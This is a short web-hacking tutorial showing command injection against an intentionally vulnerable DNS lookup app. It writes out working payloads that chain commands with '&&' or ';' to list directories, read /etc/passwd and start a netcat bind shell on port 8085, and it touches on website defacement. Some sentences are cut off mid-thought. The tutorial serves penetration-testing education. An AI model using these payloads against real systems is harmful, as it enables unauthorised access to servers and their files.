Command Injection Attack Example | Web Applications Hacking | Using Kali Linux
Read up on command injection here.
OWASP testing guide is your best friend while learning web applications hacking or penetration testing.
I tested the attack on two different vulnerable applications, one of which is
Command Injection Attack Example
Ideally, you are supposed to
lookup DNS and resolve hostnames to IP addresses using this web application. However, the code is vulnerable to ‘command injection attack’. As you know, in
bash we can execute two commands one after the other by typing:
cmd1 && cmd2
Try this in the vulnerable application (the point is to get another command executed on the server)
www.facebook.com && ls /
In the vulnerable application first Facebook’s IP address would be resolved on the server and then the second command would get executed, listing the contents of the
Now that you know the command injection vulnerability exists, you can try different commands and construct an attack
Display the contents of ‘passwd’ file
www.facebook.com && cat /etc/passwd
OR invoke netcat to listen for commands on port
8085 of the victim machine:
www.facebook.com && nc -l -p 8085 -e '/bin/bash'
See what we did here?
I assume netcat utility would be present on the server, so I tell it to listen on port
8085 (and invoke bash)
Now from our terminal, we can use our netcat client to connect to that server
nc 172.X.X.X 8085
We are connected. We can now begin executing commands on the compromised remote machine.
Note that we are a normal user–
root. Hence, we have limited privileges at this point.
However, using privileges of
www-data it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.
But in theory, if you wanted to deface the website:
It is now possible to edit this file to make changes to deface to the website.
Note that you can terminate the first command simply by typing
; and, hence, don’t always need the first part, that is,
www.facebook.com. For example:
; cat /etc/passwd